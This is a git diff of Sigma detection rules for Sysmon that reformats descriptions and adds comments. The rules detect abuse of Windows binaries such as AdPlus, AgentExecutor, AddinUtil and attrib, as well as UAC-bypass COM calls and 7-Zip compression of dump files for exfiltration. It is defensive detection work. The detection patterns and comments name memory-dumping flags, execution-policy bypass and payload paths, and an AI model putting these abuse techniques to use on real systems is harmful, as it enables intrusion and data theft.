@@ -27,6 +26,7 @@ detection: filter_main_msbuild: SourceImage|contains: :\Program Files\Microsoft Visual Studio\ SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe + # Just to make sure it's "really" .NET :) CallTrace|contains: - Microsoft.Build.ni.dll - System.ni.dll diff --git a/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml b/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml index 6b8ed89a8..2eae0be01 100644 --- a/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml +++ b/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml @@ -1,8 +1,7 @@ title: Function Call From Undocumented COM Interface EditionUpgradeManager id: fb3722e4-1a06-46b6-b772-253e2e7db933 status: test -description: Detects function calls from the EditionUpgradeManager COM interface. - Which is an interface that is not used by standard executables. +description: Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables. references: - https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/ - https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611 diff --git a/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml b/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml index 9d663705d..3c878207c 100644 --- a/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml +++ b/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using WOW64 Logger DLL Hijack id: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c status: test -description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe - 30) +description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml index 7038ee045..0f06b567d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: 7Zip Compressing Dump Files id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 related: - - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc - type: derived + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived status: experimental -description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,23 +22,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Description|contains: 7-Zip - - Image|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - Image|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml index e80e31f11..8cdc37ceb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml @@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With 7-ZIP id: 9fbf5927-5261-4284-a71d-f681029ea574 status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -20,18 +19,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Description|contains: 7-Zip - - Image|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - Image|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains: ' -p' + CommandLine|contains: ' -p' selection_action: - CommandLine|contains: + CommandLine|contains: - ' a ' - ' u ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml index f4416244f..4430fd5e9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml @@ -1,8 +1,7 @@ title: Password Protected Compressed File Extraction Via 7Zip id: b717b8fd-6467-4d7d-b3d3-27f9a463af77 status: experimental -description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract - password protected zip files. +description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. references: - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,22 +18,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Description|contains: 7-Zip - - Image|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - Image|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains|all: + CommandLine|contains|all: - ' -p' - ' x ' - ' -o' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate activity is expected since extracting files with a password can be - common in some environment. + - Legitimate activity is expected since extracting files with a password can be common in some environment. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml index 58937a8c9..a9724139c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml @@ -1,16 +1,11 @@ title: Suspicious AddinUtil.EXE CommandLine Execution id: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html -author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), - Tony Latteri (@TheLatteri) +author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) date: 2023/09/18 tags: - attack.defense_evasion @@ -24,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_susp_1_flags: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' selection_susp_1_paths: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ selection_susp_2: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:. - -AddInRoot:"." - -PipelineRoot:. @@ -49,8 +44,7 @@ detection: - \Downloads\ - \Users\Public\ - \Windows\Temp\ - condition: process_creation and (selection_img and (all of selection_susp_1_* - or selection_susp_2)) + condition: process_creation and (selection_img and (all of selection_susp_1_* or selection_susp_2)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml index 58f8c5c68..949d505d2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml @@ -1,11 +1,8 @@ title: Uncommon Child Process Of AddinUtil.EXE id: b5746143-59d6-4603-8d06-acbd60e166ee status: experimental -description: 'Detects uncommon child processes of the Add-In deployment cache updating - utility (AddInutil.exe) which could be a sign of potential abuse of the binary - to proxy execution via a custom Addins.Store payload. - - ' +description: | + Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml index a108c7b65..6207b06cd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml @@ -1,12 +1,8 @@ title: Uncommon AddinUtil.EXE CommandLine Execution id: 4f2cd9b6-4a17-440f-bb2a-687abb65993a status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -23,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' filter_main_addinroot: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -AddInRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml index 91aa6ec42..2c65c1e08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml @@ -1,8 +1,7 @@ title: AddinUtil.EXE Execution From Uncommon Directory id: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 status: experimental -description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - from a non-standard directory. +description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -19,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe filter_main_legit_location: Image|contains: - :\Windows\Microsoft.NET\Framework\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml index 231dfe1ff..a2af25c61 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml @@ -1,9 +1,7 @@ title: Potential Adplus.EXE Abuse id: 2f869d59-7f6a-4931-992c-cce556ff2d53 status: experimental -description: Detects execution of "AdPlus.exe", a binary that is part of the Windows - SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary - commands. +description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 @@ -24,16 +22,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \adplus.exe - - OriginalFileName: Adplus.exe + - Image|endswith: \adplus.exe + - OriginalFileName: Adplus.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Dump process memory - ' -hang ' - ' -pn ' - ' -pmn ' - ' -p ' - ' -po ' + # Using a config file - ' -c ' + # Execute commands inline - ' -sc ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml index 1bd860418..7af8763d9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml @@ -1,13 +1,10 @@ title: AgentExecutor PowerShell Execution id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 related: - - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab - type: similar + - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 @@ -27,15 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - Image: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use via Intune management. You exclude script paths and names to - reduce FP rate + - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml index 5fbbed0f3..e911854df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml @@ -1,13 +1,10 @@ title: Suspicious AgentExecutor PowerShell Execution id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab related: - - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 - type: similar + - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 @@ -27,14 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - Image|endswith: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' filter_main_pwsh: - CommandLine|contains: + CommandLine|contains: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ - C:\Windows\System32\WindowsPowerShell\v1.0\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml index 789086c84..573957983 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml @@ -1,17 +1,11 @@ title: Uncommon Child Process Of Appvlp.EXE id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: test -description: 'Detects uncommon child processes of Appvlp.EXE - - Appvlp or the Application Virtualization Utility is included with Microsoft Office. - Attackers are able to abuse "AppVLP" to execute shell commands. - - Normally, this binary is used for Application Virtualization, but it can also - be abused to circumvent the ASR file path rule folder - +description: | + Detects uncommon child processes of Appvlp.EXE + Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. + Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. - - ' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ author: Sreeman @@ -31,6 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: \appvlp.exe + # Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/ filter_main_generic: Image|endswith: - :\Windows\SysWOW64\rundll32.exe @@ -46,8 +41,7 @@ detection: filter_optional_office_msouc: Image|contains: :\Program Files\Microsoft Office Image|endswith: \MSOUC.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml index 4100224f7..4859dc778 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml @@ -1,15 +1,14 @@ title: AspNetCompiler Execution -id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 +id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar status: test -description: Detects execution of "aspnet_compiler.exe" which can be abused to compile - and execute C# code. +description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml index 3ba255b92..75ce0c42b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml @@ -1,12 +1,12 @@ title: Suspicious Child Process of AspNetCompiler -id: 9ccba514-7cb6-4c5c-b377-700758f2f120 +id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild related: - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental description: Detects potentially suspicious child processes of "aspnet_compiler.exe". references: @@ -28,17 +28,18 @@ detection: selection_parent: ParentImage|endswith: \aspnet_compiler.exe selection_child: - - Image|endswith: - - \calc.exe - - \notepad.exe - - Image|contains: - - \Users\Public\ - - \AppData\Local\Temp\ - - \AppData\Local\Roaming\ - - :\Temp\ - - :\Windows\Temp\ - - :\Windows\System32\Tasks\ - - :\Windows\Tasks\ + # Note: add other potential suspicious child processes and paths + - Image|endswith: + - \calc.exe + - \notepad.exe + - Image|contains: + - \Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Local\Roaming\ + - :\Temp\ + - :\Windows\Temp\ + - :\Windows\System32\Tasks\ + - :\Windows\Tasks\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml index cabf01e3a..809b0e7e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml @@ -1,15 +1,14 @@ title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler -id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 +id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: Detects execution of "aspnet_compiler.exe" with potentially suspicious - paths for compilation. +description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -31,7 +30,8 @@ detection: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ Image|endswith: \aspnet_compiler.exe - CommandLine|contains: + CommandLine|contains: + # Note: add other potential suspicious paths - \Users\Public\ - \AppData\Local\Temp\ - \AppData\Local\Roaming\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml index a2a8a23b7..2412fcac5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml @@ -1,8 +1,7 @@ title: Interactive AT Job id: 60fc936d-2eb0-4543-8a13-911c750a1dfc status: test -description: Detects an interactive AT job, which may be used as a form of privilege - escalation. +description: Detects an interactive AT job, which may be used as a form of privilege escalation. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \at.exe - CommandLine|contains: interactive + CommandLine|contains: interactive condition: process_creation and selection falsepositives: - Unlikely (at.exe deprecated as of Windows 8) diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml index 36c3553d4..fd23ffbff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml @@ -20,20 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +h ' + CommandLine|contains: ' +h ' filter_msiexec: - CommandLine|contains: '\desktop.ini ' + CommandLine|contains: '\desktop.ini ' filter_intel: ParentImage|endswith: \cmd.exe - CommandLine: +R +H +S +A \\\*.cui + CommandLine: +R +H +S +A \\\*.cui ParentCommandLine: C:\\WINDOWS\\system32\\\*.bat condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of - cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) + - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) - Msiexec.exe hiding desktop.ini level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml index 95c99addc..7d3bbf7bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml @@ -1,11 +1,10 @@ title: Set Files as System Files Using Attrib.EXE id: bb19e94c-59ae-4c15-8c12-c563d23fe52b related: - - id: efec536f-72e8-4656-8960-5e85d091345b - type: similar + - id: efec536f-72e8-4656-8960-5e85d091345b + type: similar status: experimental -description: Detects the execution of "attrib" with the "+s" flag to mark files as - system files +description: Detects the execution of "attrib" with the "+s" flag to mark files as system files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s ' + CommandLine|contains: ' +s ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml index 1deb89e32..a3636c287 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml @@ -1,15 +1,11 @@ title: Set Suspicious Files as System Files Using Attrib.EXE id: efec536f-72e8-4656-8960-5e85d091345b related: - - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b - type: derived + - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b + type: derived status: experimental -description: 'Detects the usage of attrib with the "+s" option to set scripts or executables - located in suspicious locations as system files to hide them from users and make - them unable to be deleted with simple rights. The rule limits the search to specific - extensions and directories to avoid FPs - - ' 